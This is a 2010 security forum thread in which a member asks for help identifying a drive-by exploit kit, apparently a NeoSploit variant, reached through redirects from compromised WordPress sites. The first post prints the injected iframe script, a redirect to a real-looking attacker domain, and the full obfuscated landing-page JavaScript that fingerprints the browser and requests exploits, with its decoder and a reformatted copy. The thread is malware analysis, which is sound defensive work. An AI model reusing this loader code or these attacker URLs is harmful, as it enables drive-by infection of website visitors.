Author Topic: 178.162.181.58 - Help Identifying Drive By?  (Read 4774 times)

0 Members and 1 Guest are viewing this topic.

December 02, 2010, 09:52:03 am
Read 4774 times

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
We are seeing lots of people get redirected from various sites that appear to be wordpress based and they are being redirected to hosts located on 178.162.181.58.

The drive by kit on this seems to be slightly different from what I am used to seeing so I was wondering if someone could clue me in to what this is? It kind of looks like NeoSploit, but I am not sure if it is a different version or something. What makes me think that is the  It is using the midi parse and java webstart vulnerabilities. It also serves these malicious jars up multiple times for some reason to the client.

Once hitting the site, the user is redirected with javascript thats starts off with:

Code: [Select]
eval('\\144\\157\\143\\165\\155\\145\\156\\164\\56\\167\\162\\151\\164\\145\\50\\47\\74\\151\\146\\162\\141\\155\\145\\40\\163\\162\\143\\75\\42\\150\\164\\164\\160\\72\\57\\57\
this translates to:
Code: [Select]
eval document.write ('<iframe src="http://
Following this redirect then causes the client to hit another redirect:
Code: [Select]
<script type="text/javascript">location.href = ("http://innovine.org/?2");</script>
The ?2 can also be other numbers (?3, etc). Following this then finally causes the user to hit the landing page. Things here are broken up slightly. The landing page refrences another script to deobfuscate and execute.

Landinge page:
Code: [Select]
<html><head><script type='text/javascript' src='http://innovine.org/?36babd0de612ba0a4055105a5050015c060e595050540b55010f5351555508570b'></script></head><body><input type='hidden' id='Y0IB5' value='MFRU3gs2zf5t4_098PCaQblu1cDpe7d6wZ'><div id='hoy'></div><div id='fay'></div><div id='nus'></div><script>mel='_DtQ2c22gaU4ZwZp7u';web=18;leg=jag(mel,web);fun='88QP18DDw8RMslz5';gab=15;hao=jag(fun,gab);git=window;yay=git[hao];rya=git[leg];function tit(v){var k,m,r;r='a1Fl9Q7wfZu6U1PQ6R';k=10;m=jag(r,k);return typeof v!=m}function lug(q,g){var n,a,u,y,o,d,v;v='5bReDlF44a3ddzl0013M_blb6_zR';u=21;d=jag(v,u);y='Dg8zswd3Ccc1_5gC7U';o=5;a=jag(y,o);n=yay[d](q);if(n){n[a]=g}}function peg(d,k,r){var y,v,s;v='bc24uMf7p4t57M';s=8;y=jag(v,s);return d[y](k,r)}function khi(m,w){return new RegExp(m,w)}function yip(b){var i,a,f,r,d,o,q,u,h,n,y,m,c,v,p,t,j,k;n='tlg4Z4pQ';r=20;t=jag(n,r);p='Qd3uC1RcCpMl00';k=9;v=jag(p,k);u='1w58ed88MglZsCDR0cMgQ5';m=7;h=jag(u,m);o='5zzRRDwd';d=19;y=jag(o,d);q='87QC1setdwRs';f=15;a=jag(q,f);try{c=khi(b,'i');i=rya[v];if(tit(i)){for(j=0;j<i[a];j++){if(c[y](i[j][t])||c[y](i[j][h])){return i[j]}}}}catch(e){}return null}function cel(n){var x,f,a,j,t,z,p,b;z='4bzR38M_eDDD';j=19;t=jag(z,j);b='3z2suwfacat8zseP6Z97Z3P8Zz';a=8;f=jag(b,a);if(tit(git[f])){for(x=0;x<n[t];x++){try{p=new ActiveXObject(n[x]);if(p)return p}catch(e){}}}return null}function dim(c){var d,l,i,x,u,m;d='1R813zes';u=5;i=jag(d,u);m='eRDz1F12lCQP';x=1;l=jag(m,x);return(typeof c==l&&(/\d/)[i](c))}function lac(a){var p,v,y,t,x,n,m,r,l,f,w,k,o;r='s_wfb38pzU6tuzCM';v=4;w=jag(r,v);o='FC2wPMcR';n=30;k=jag(o,n);t='RgQpcwlMsf167RDZ2QeF4UpUtDw5_P';x=8;m=jag(t,x);y='UubzFeabFRPwZQ';f=26;p=jag(y,f);l=dim(a)?khi(m)[k](a):null;return l?l[0][p](khi(w,'g'),','):null}function ava(j){var l,m,r,o,d,s,n,x,q,i,u,f,k,y,b,a,g,h,w,t;x='bw2pudfZpUtMpe';u=8;w=jag(x,u);d='fClD0e5cRFwzgzF70bzpR4dMlR';s=3;y=jag(d,s);a='t_g6Z6p3';q=20;b=jag(a,q);g='P6ul74Fagz_C';r=14;f=jag(g,r);h='9bPePUbw3Qcsp37u6fZdFM';t=16;m=jag(h,t);i=rya[w];o=(tit(i)?i[f]:0);k=(tit(git[y])?1:0);n=0;try{n=(rya[m]()?1:0)}catch(e){}l=[j,o,k,(n?1:0)];return l[b](';')}function opt(){var f,u,fg,p,g,k,o,w,r,y,v,x,b,a,n,s,t,j,q,m,fp,l,ff,d,z,i,h,c;p='M05plM';f=29;g=jag(p,f);w='sc1tzw1a';x=25;t=jag(w,x);r='ZQfD9su5f92Z94bp6eU8_1aF7PF1fd';l=30;q=jag(r,l);y='11z_dR8RM5leu0e90QMDQDsd1M';a=7;z=jag(y,a);i='RCCwd94U183e';s=27;h=jag(i,s);b='uzg8uMf0p8tC5e_1629FZs';d=8;k=jag(b,d);u='_09aPQbC';o=16;j=jag(u,o);n='fwgw6ezMa8_52ZUF6buCP0_s';v=20;c=jag(n,v);m='d0Dz1sls7fd6e78Z054z5bs2su3MR05dwfegecRU6F7ep4cRuw0uabP1zPsQ38f0MZg8d7FMZc6Rl0pwcdudbdae5a9Q_ltQfF28g5UzeQZz6u73pUcMulbda3Pl91_lt_fCMZg5URF5ZC6s7spRcFuwbda1Pl91_4tQRz24g1U4eU';fp=1;ff=jag(m,fp);ff=ava(ff);fg=yay[z](h);fg[c](j,q);fg[c](g,ff);yay[t][k](fg)}opt();</script></body></html>
Script being refrenced in the beginning:
Code: [Select]
function jag(u,h){var s,o,n,j,a,w,c,p,n,g,r,q;g=document.getElementById('Y0IB5').value;r='';q='';o=0;w='substr';j=u.length;for(c=0;c<j;c++){o+=h;n=u.charAt(c);a=g.indexOf(n);a+=o;a%=g.length;r+=g.charAt(a)}for(p=0;p<j;p+=2){n=r[w](p,2);s=parseInt(n,16);q+=String.fromCharCode(s)}return q}
Here I have just tossed it all together and made it easier to step through with FireBug:

Code: [Select]
<html><head><script type='text/javascript'>
function jag(u,h){var s,o,n,j,a,w,c,p,n,g,r,q;
g=document.getElementById('Y0IB5').value;
r='';
q='';
o=0;
w='substr';
j=u.length;
for(c=0;
c<j;
c++){o+=h;
n=u.charAt(c);
a=g.indexOf(n);
a+=o;
a%=g.length;
r+=g.charAt(a)}for(p=0;
p<j;
p+=2){n=r[w](p,2);
s=parseInt(n,16);
q+=String.fromCharCode(s)}return q}
</script></head>
<body>
<input type='hidden' id='Y0IB5' value='MFRU3gs2zf5t4_098PCaQblu1cDpe7d6wZ'>
<div id='hoy'></div>
<div id='fay'></div>
<div id='nus'></div>
<script>
mel='_DtQ2c22gaU4ZwZp7u';
web=18;
leg=jag(mel,web);
fun='88QP18DDw8RMslz5';
gab=15;
hao=jag(fun,gab);
git=window;
yay=git[hao];
rya=git[leg];
function tit(v){var k,m,r;
r='a1Fl9Q7wfZu6U1PQ6R';
k=10;
m=jag(r,k);
return typeof v!=m}function lug(q,g){var n,a,u,y,o,d,v;
v='5bReDlF44a3ddzl0013M_blb6_zR';
u=21;
d=jag(v,u);
y='Dg8zswd3Ccc1_5gC7U';
o=5;
a=jag(y,o);
n=yay[d](q);
if(n){n[a]=g}}function peg(d,k,r){var y,v,s;
v='bc24uMf7p4t57M';
s=8;
y=jag(v,s);
return d[y](k,r)}function khi(m,w){return new RegExp(m,w)}function yip(b){var i,a,f,r,d,o,q,u,h,n,y,m,c,v,p,t,j,k;
n='tlg4Z4pQ';
r=20;
t=jag(n,r);
p='Qd3uC1RcCpMl00';
k=9;
v=jag(p,k);
u='1w58ed88MglZsCDR0cMgQ5';
m=7;
h=jag(u,m);
o='5zzRRDwd';
d=19;
y=jag(o,d);
q='87QC1setdwRs';
f=15;
a=jag(q,f);
try{c=khi(b,'i');
i=rya[v];
if(tit(i)){for(j=0;
j<i[a];
j++){if(c[y](i[j][t])||c[y](i[j][h])){return i[j]}}}}catch(e){}return null}function cel(n){var x,f,a,j,t,z,p,b;
z='4bzR38M_eDDD';
j=19;
t=jag(z,j);
b='3z2suwfacat8zseP6Z97Z3P8Zz';
a=8;
f=jag(b,a);
if(tit(git[f])){for(x=0;
x<n[t];
x++){try{p=new ActiveXObject(n[x]);
if(p)return p}catch(e){}}}return null}function dim(c){var d,l,i,x,u,m;
d='1R813zes';
u=5;
i=jag(d,u);
m='eRDz1F12lCQP';
x=1;
l=jag(m,x);
return(typeof c==l&&(/\d/)[i](c))}function lac(a){var p,v,y,t,x,n,m,r,l,f,w,k,o;
r='s_wfb38pzU6tuzCM';
v=4;
w=jag(r,v);
o='FC2wPMcR';
n=30;
k=jag(o,n);
t='RgQpcwlMsf167RDZ2QeF4UpUtDw5_P';
x=8;
m=jag(t,x);
y='UubzFeabFRPwZQ';
f=26;
p=jag(y,f);
l=dim(a)?khi(m)[k](a):null;
return l?l[0][p](khi(w,'g'),','):null}function ava(j){var l,m,r,o,d,s,n,x,q,i,u,f,k,y,b,a,g,h,w,t;
x='bw2pudfZpUtMpe';
u=8;
w=jag(x,u);
d='fClD0e5cRFwzgzF70bzpR4dMlR';
s=3;
y=jag(d,s);
a='t_g6Z6p3';
q=20;
b=jag(a,q);
g='P6ul74Fagz_C';
r=14;
f=jag(g,r);
h='9bPePUbw3Qcsp37u6fZdFM';
t=16;
m=jag(h,t);
i=rya[w];
o=(tit(i)?i[f]:0);
k=(tit(git[y])?1:0);
n=0;
try{n=(rya[m]()?1:0)}catch(e){}l=[j,o,k,(n?1:0)];
return l[b](';')}function opt(){var f,u,fg,p,g,k,o,w,r,y,v,x,b,a,n,s,t,j,q,m,fp,l,ff,d,z,i,h,c;
p='M05plM';
f=29;
g=jag(p,f);
w='sc1tzw1a';
x=25;
t=jag(w,x);
r='ZQfD9su5f92Z94bp6eU8_1aF7PF1fd';
l=30;
q=jag(r,l);
y='11z_dR8RM5leu0e90QMDQDsd1M';
a=7;
z=jag(y,a);
i='RCCwd94U183e';
s=27;
h=jag(i,s);
b='uzg8uMf0p8tC5e_1629FZs';
d=8;
k=jag(b,d);
u='_09aPQbC';
o=16;
j=jag(u,o);
n='fwgw6ezMa8_52ZUF6buCP0_s';
v=20;
c=jag(n,v);
m='z3el853MFpDg0pD80uRclZ42wZlDz6w1dezDdaCe87FPus3zDdbFfd6aa2M376P3gRQ39RUDCg_RFC8MtwZ8bCf66Ca22e7fP3gep0zaUQcR_MeQust_Z80Cfd6zas2b78PggDp29wU1c4_9FCu4teZQbzfu6CaR2elDP3w1p59wU1c5';
fp=23;
ff=jag(m,fp);
ff=ava(ff);
fg=yay[z](h);
fg[c](j,q);
fg[c](g,ff);
yay[t][k](fg)}opt();
</script></body></html>


Looks like it enumerates browser and plugin information and then makes requests for specific exploits? I should have paid more attention in that RE class, I didn't think I'd ever have to be setting breakpoints in a DOM to understand what JavaScript was doing...




 



December 02, 2010, 05:39:17 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
I have seen a lot of them in the last days, but I don't know what it is and I  haven't had time to look at it closer.
Ruining the bad guy's day

December 02, 2010, 07:40:12 pm
Reply #2

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Feels like a newer version of NeoSploit just because of the three div id's that are in there along with the external javascript required to decode everything:

Code: [Select]
<body>
<input type='hidden' id='Y0IB5' value='MFRU3gs2zf5t4_098PCaQblu1cDpe7d6wZ'>
<div id='hoy'></div>
<div id='fay'></div>
<div id='nus'></div>

Could be wrong though.